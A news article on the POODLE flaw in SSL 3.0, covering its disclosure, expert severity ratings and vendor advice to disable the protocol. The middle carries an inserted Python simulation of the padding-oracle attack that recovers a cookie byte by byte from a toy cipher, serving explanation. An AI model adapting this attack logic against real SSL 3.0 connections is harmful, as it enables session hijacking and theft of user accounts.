Beware Poodle Bug!

Three Google researchers have uncovered a security bug in widely used web encryption technology that they say could allow hackers to take over accounts for email, banking and other services in what they have dubbed a "Poodle" attack.

The discovery of "Poodle," which stands for Padding Oracle On Downgraded Legacy Encryption, prompted makers of web browsers and server software to advise users on Tuesday to disable use of the source of the security bug: an 18-year-old encryption standard known as SSL 3.0.
It was the third time this year that researchers have uncovered a vulnerability in widely used web technology, following April's "Heartbleed" bug in OpenSSL and last month's "Shellshock" bug in a piece of Unix software known as Bash.

Security experts said that hackers could steal browser "cookies" in "Poodle" attacks, potentially taking control of email, banking and social networking accounts. Even so, experts said the threat was not as serious as the two prior bugs.

"If Shellshock and Heartbleed were Threat Level 10, then Poodle is more like a 5 or a 6," said Tal Klein, vice president with cloud security firm Adallom.

The threat was disclosed in a research paper published on the website of the OpenSSL Project, which develops the most widely used type of SSL encryption software.

Rumors of a bug in SSL software had been circulating in recent days, prompting some security professionals to prepare for a major new threat this week.

Ivan Ristic, director of application security research with Qualys, said "Poodle" was not as serious as the previous threats because the attack was "quite complicated," requiring hackers to have privileged access to networks.

Jeff Moss, a cyber adviser to the U.S. Department of Homeland Security, said attackers would need to launch a "man-in-the-middle" attack, placing themselves between victims and websites using approaches such as creating rogue WiFi "hotspots" in Internet cafes.
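The attack model in the paragraphs above, worked through as an added simulation that is not code from the Google researchers or from this page: SSL 3.0 checks only the last byte of a CBC record's padding, so a man-in-the-middle who can (a) make the victim's browser resend the same cookie with the request shifted a byte at a time and (b) swap ciphertext blocks before they reach the server learns one cookie byte from roughly every 256 accept-or-reject answers. Everything here is constructed: the toy Feistel cipher standing in for the block cipher, the simplified MAC-then-encrypt record layer, the hypothetical SESSION_KEY and SECRET_COOKIE, and the client_request / ssl3_server_accepts pair playing browser and server. The strict_padding switch applies the TLS 1.0 rule that every padding byte must equal the pad length, which is what the same trick fails against.

```python
"""Simulation of the POODLE padding oracle against SSL 3.0 CBC records.

Constructed for illustration: toy block cipher, simplified record layer,
hypothetical browser/server sharing SESSION_KEY. Not real SSL/TLS code.
"""
import hashlib
import hmac
import secrets

BLOCK = 16                                      # block size, as for AES-CBC
MAC_LEN = 32                                    # HMAC-SHA256 stands in for the SSL 3.0 MAC
SESSION_KEY = b"constructed-session-key-0001"   # hypothetical negotiated key
SECRET_COOKIE = b"sid=0123456789abcdef"         # hypothetical cookie the attacker wants
COOKIE_OFFSET = len(b"POST /") + len(b" HTTP/1.1\r\nCookie: ")  # request layout known to attacker


def _round(key, r, half):
    return hmac.new(key, bytes([r]) + half, hashlib.sha256).digest()[:BLOCK // 2]

def block_encrypt(key, block):
    """Toy 16-byte keyed permutation (4-round Feistel) standing in for AES."""
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for r in range(4):
        left, right = right, bytes(a ^ b for a, b in zip(left, _round(key, r, right)))
    return left + right

def block_decrypt(key, block):
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for r in reversed(range(4)):
        left, right = bytes(a ^ b for a, b in zip(right, _round(key, r, left))), left
    return left + right

def ssl3_encrypt_record(key, data):
    """MAC-then-encrypt in CBC with SSL 3.0 padding: pad bytes are arbitrary,
    only the final byte (the pad length) is checked by the receiver."""
    body = data + hmac.new(key, data, hashlib.sha256).digest()
    pad_len = BLOCK - 1 - len(body) % BLOCK
    body += secrets.token_bytes(pad_len) + bytes([pad_len])
    prev = secrets.token_bytes(BLOCK)   # fresh IV per record; SSL 3.0 chains IVs, same effect
    blocks = [prev]
    for i in range(0, len(body), BLOCK):
        prev = block_encrypt(key, bytes(a ^ b for a, b in zip(body[i:i + BLOCK], prev)))
        blocks.append(prev)
    return blocks                         # [IV, C1, C2, ...]

def ssl3_server_accepts(key, blocks, strict_padding=False):
    """The oracle: does the record decrypt and verify? strict_padding=False is
    the SSL 3.0 check POODLE exploits; True is the TLS 1.0 rule (every padding
    byte must equal the pad length)."""
    body = b"".join(bytes(a ^ b for a, b in zip(block_decrypt(key, cur), prev))
                    for prev, cur in zip(blocks, blocks[1:]))
    pad_len = body[-1]
    if pad_len >= BLOCK or len(body) < pad_len + 1 + MAC_LEN:
        return False
    if strict_padding and body[-(pad_len + 1):] != bytes([pad_len]) * (pad_len + 1):
        return False
    data, mac = body[:-(pad_len + 1 + MAC_LEN)], body[-(pad_len + 1 + MAC_LEN):-(pad_len + 1)]
    return hmac.compare_digest(mac, hmac.new(key, data, hashlib.sha256).digest())

def client_request(prefix_len, suffix_len):
    """The victim's browser: attacker-injected script chooses the path and body
    lengths, the browser attaches the cookie and encrypts the record."""
    data = (b"POST /" + b"A" * prefix_len + b" HTTP/1.1\r\nCookie: " + SECRET_COOKIE
            + b"\r\n\r\n" + b"B" * suffix_len)
    return ssl3_encrypt_record(SESSION_KEY, data)

def poodle_recover_byte(k, cookie_len, strict_padding=False, max_tries=20000):
    """Man-in-the-middle recovery of cookie byte k. Returns (byte, tries) or
    (None, max_tries). Expected cost is about 256 records per byte."""
    prefix = (BLOCK - 1 - COOKIE_OFFSET - k) % BLOCK      # byte k becomes last byte of its block
    data_len = COOKIE_OFFSET + prefix + cookie_len + len(b"\r\n\r\n")
    suffix = -(data_len + MAC_LEN) % BLOCK                # final block becomes padding only
    target = (COOKIE_OFFSET + prefix + k) // BLOCK + 1    # index of that block in [IV, C1, ...]
    for tries in range(1, max_tries + 1):
        blocks = client_request(prefix, suffix)
        forged = blocks[:-1] + [blocks[target]]           # copy target block over padding block
        if ssl3_server_accepts(SESSION_KEY, forged, strict_padding):
            # accepted only if D(C_t) ^ C_{n-1} ends in 0x0F, and D(C_t) = P_t ^ C_{t-1}
            return (BLOCK - 1) ^ blocks[target - 1][-1] ^ blocks[-2][-1], tries
    return None, max_tries

def poodle_recover_cookie(cookie_len, strict_padding=False):
    recovered = bytearray()
    for k in range(cookie_len):
        byte, _ = poodle_recover_byte(k, cookie_len, strict_padding)
        if byte is None:
            return None
        recovered.append(byte)
    return bytes(recovered)

if __name__ == "__main__":
    print("SSL 3.0 padding check:", poodle_recover_cookie(len(SECRET_COOKIE)))
    print("TLS 1.0 padding check:", poodle_recover_byte(0, len(SECRET_COOKIE), True, 2000))
```

The simulation is what makes the "complicated" and "man-in-the-middle" caveats above concrete: the attacker never breaks the cipher, only replays the victim's own ciphertext blocks and counts server rejections, and needs thousands of requests the browser will only generate if the attacker is already on the path and can inject script. With the TLS-style padding check every padding byte would have to match by chance, so the oracle never fires.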

Google suggested a technical workaround for web servers and clients, TLS_FALLBACK_SCSV, a signal a client adds when it retries a handshake at a lower protocol version so that a server supporting the signal can refuse the downgrade, but added on its blog that it hopes to eventually remove support for SSL 3.0 from all client software.

Mozilla plans to disable SSL 3.0 by default in the next version of its Firefox browser, to be released on Nov. 25. (mzl.la/1DaxOwY).

"SSL version 3.0 is no longer secure," Mozilla said on its blog. "Browsers and websites need to turn off SSLv3 and use more modern security protocols as soon as possible."

Microsoft Corp issued an advisory suggesting that customers disable SSL 3.0 on Windows for servers and PCs.

Representatives with Apple Inc could not be reached. An Oracle Corp spokeswoman had no immediate comment. Matthew Green, an assistant research professor of computer science at Johns Hopkins University, said that disabling SSL 3.0 can be difficult for some computer users.
"It's not going to take out the infrastructure of the Internet. But it's going to be a hassle to fix," Green said.
